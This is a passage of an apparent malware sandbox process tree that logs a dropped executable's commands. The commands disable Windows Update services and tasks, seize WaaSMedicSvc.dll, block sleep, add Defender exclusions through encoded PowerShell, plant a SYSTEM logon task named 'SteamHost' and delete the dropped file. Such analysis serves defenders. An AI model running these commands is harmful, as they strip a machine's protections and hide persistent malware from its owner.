/TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:220
C:\Windows\system32\sc.exe
sc stop wuauserv
7⤵
- Launches sc.exe
PID:920
C:\Windows\system32\sc.exe
sc stop bits
7⤵
- Launches sc.exe
PID:216
C:\Windows\system32\sc.exe
sc stop dosvc
7⤵
- Launches sc.exe
PID:2536
C:\Windows\system32\sc.exe
sc stop UsoSvc
7⤵
- Launches sc.exe
PID:4608
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
7⤵
- Launches sc.exe
PID:3392
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
7⤵
- Launches sc.exe
PID:2608
C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
7⤵
- Launches sc.exe
PID:1736
C:\Windows\system32\sc.exe
sc config bits start= disabled
7⤵
- Launches sc.exe
PID:4780
C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
7⤵
- Launches sc.exe
PID:1164
C:\Windows\system32\sc.exe
sc config dosvc start= disabled
7⤵
- Launches sc.exe
PID:3508
C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
7⤵
- Launches sc.exe
PID:2440
C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
7⤵
- Launches sc.exe
PID:4520
C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
7⤵
- Launches sc.exe
PID:4172
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
7⤵
- Launches sc.exe
PID:5044
C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
7⤵
- Launches sc.exe
PID:1280
C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5088
C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3284
C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
7⤵
PID:3152
C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
7⤵
PID:2884
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
7⤵
PID:4840
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
7⤵
PID:920
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
7⤵
PID:3056
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
7⤵
PID:2384
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
7⤵
PID:4768
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
7⤵
PID:2368
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
7⤵
PID:3832
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
7⤵
PID:4156
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
7⤵
PID:4100
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
7⤵
PID:4900
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:1968
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
6⤵
- Power Settings
PID:4100
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
7⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3056
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
7⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3016
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
7⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3296
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
7⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4156
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
6⤵
- Drops file in Windows directory
PID:836
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
6⤵
PID:4176
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"
7⤵
- Scheduled Task/Job: Scheduled Task
PID:4556
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"
6⤵
PID:4100
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
- Suspicious use of SetWindowsHookEx
PID:4608
C:\Users\Admin\Chrome\updater.exe
C:\Users\Admin\Chrome\updater.exe
7⤵
- Executes dropped EXE
PID:1424
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"
8⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
PID:1288
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="9⤵PID:3704
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
PID:4996
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="10⤵
- Suspicious use of AdjustPrivilegeToken
PID:2792
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
9⤵
PID:3788
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
PID:3832
C:\Windows\system32\sc.exe
sc stop wuauserv
10⤵
- Launches sc.exe
PID:392
C:\Windows\system32\sc.exe
sc stop bits
10⤵
- Launches sc.exe
PID:2996
C:\Windows\system32\sc.exe
sc stop dosvc
10⤵
- Launches sc.exe
PID:1856
C:\Windows\system32\sc.exe
sc stop UsoSvc
10⤵
- Launches sc.exe
PID:740
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
10⤵
- Launches sc.exe
PID:4528
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
10⤵
- Launches sc.exe
PID:4808
C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
10⤵
- Launches sc.exe
PID:1984
C:\Windows\system32\sc.exe
sc config bits start= disabled
10⤵
- Launches sc.exe
PID:5032
C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
10⤵
- Launches sc.exe
PID:4508
C:\Windows\system32\sc.exe
sc config dosvc start= disabled
10⤵
- Launches sc.exe
PID:4900
C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
10⤵
- Launches sc.exe
PID:2356
C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
10⤵
- Launches sc.exe
PID:4256
C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
10⤵
- Launches sc.exe
PID:3296
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
10⤵
- Launches sc.exe
PID:3972
C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
10⤵
- Launches sc.exe
PID:3376
C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1092
C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
10⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3996
C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
10⤵
PID:920
C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
10⤵
PID:1196
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
10⤵
PID:2284
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
10⤵
PID:2248
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
10⤵
PID:1804
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
10⤵
PID:1208
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
10⤵
PID:4964
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
10⤵
PID:2336
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
10⤵
PID:3060
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
10⤵
PID:3680
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
10⤵
PID:5072
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
10⤵
PID:2608
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
10⤵
PID:3972
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
9⤵
- Power Settings
PID:380
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
10⤵
- Suspicious use of SetWindowsHookEx
PID:1608
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
10⤵
- Power Settings
PID:4840
C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
10⤵
- Power Settings
PID:3600
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
10⤵
- Power Settings
PID:4248
C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
10⤵
- Power Settings
PID:2736
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
9⤵
PID:2500
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"
10⤵
PID:216
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
6⤵
PID:1820
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
- Suspicious use of SetWindowsHookEx
PID:3392
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
7⤵
PID:4428
C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3600
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\svchost.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2012
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
5⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4308
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="6⤵
- Suspicious use of WriteProcessMemory
PID:1432
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2440
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
6⤵
- Suspicious use of WriteProcessMemory
PID:1468
C:\Windows\system32\sc.exe
sc stop wuauserv
7⤵
- Launches sc.exe
PID:1656
C:\Windows\system32\sc.exe
sc stop bits
7⤵
- Launches sc.exe
PID:1048
C:\Windows\system32\sc.exe
sc stop dosvc
7⤵
- Launches sc.exe
PID:3856
C:\Windows\system32\sc.exe
sc stop UsoSvc
7⤵
- Launches sc.exe
PID:3048
C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
7⤵
- Launches sc.exe
PID:2400
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
7⤵
- Launches sc.exe
PID:4736
C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
7⤵
- Launches sc.exe
PID:1076
C:\Windows\system32\sc.exe
sc config bits start= disabled
7⤵
- Launches sc.exe
PID:1932
C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
7⤵
- Launches sc.exe
PID:3428
C:\Windows\system32\sc.exe
sc config dosvc start= disabled
7⤵
- Launches sc.exe
PID:2572
C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
7⤵
- Launches sc.exe
PID:4900
C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
7⤵
- Launches sc.exe
PID:1564
C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
7⤵
- Launches sc.exe
PID:1632
C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
7⤵
- Launches sc.exe
PID:1424
C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
7⤵
- Launches sc.exe
PID:4168
C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1208
C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4016
C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
7⤵
PID:1760
C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
7⤵
PID:1076
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
7⤵
PID:2888
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
7⤵
PID:3360
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
7⤵
PID:2012
C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
7⤵
PID:4092
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
7⤵
PID:2552
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
7⤵
PID:4292
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
7⤵
PID:4848
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
7⤵
PID:4604
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
7⤵
PID:1220
C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
7⤵
PID:3232
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE7⤵PID:4468
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 06⤵
- Power Settings
PID:1472 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2248 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4036 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:880 -
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 07⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:228 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe6⤵
- Drops file in Windows directory
PID:4808 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"6⤵PID:4740
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "SteamHost" /tr "C:\Users\Admin\Chrome\updater.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:4256 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\Chrome\updater.exe"6⤵PID:4092
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:2332 -
C:\Users\Admin\Chrome\updater.exeC:\Users\Admin\Chrome\updater.exe7⤵
- Executes dropped EXE
PID:1328 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Chrome\updater.exe"8⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4168 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="9⤵PID:2664
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Suspicious use of SetWindowsHookEx
PID:3936 -
